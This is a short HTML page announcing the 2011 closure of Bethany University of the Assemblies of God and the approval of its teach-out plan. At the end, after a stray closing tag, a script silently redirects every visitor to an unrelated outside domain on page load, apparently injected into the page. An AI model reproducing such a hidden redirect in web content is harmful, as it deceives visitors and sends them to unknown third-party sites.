<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style type="text/css">
.center
{
background-color:#FA4;	
margin:auto;
width:60%;

}
.center {
	font-family: Arial, Helvetica, sans-serif;
}
</style>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Bethany University</title>
</head>

<body bgcolor="#FA4"><div class="center">
<p><h1><img src="bu.png" alt="BU" width="57" height="62" hspace="5" align="absmiddle" />Bethany University</h1>
<p>Closure of Bethany University of the Assemblies of God
  On August 8, 2011 a Teach-out Plan to facilitate the closure of Bethany University was submitted to the Western Association of Schools and Colleges (WASC) and  subsequently received approval on August 16, 2011.</p>
<hr />

</script>
 <script type="text/javascript">
<!--
window.location = "http://usmba.info"
//-->
</script>
 
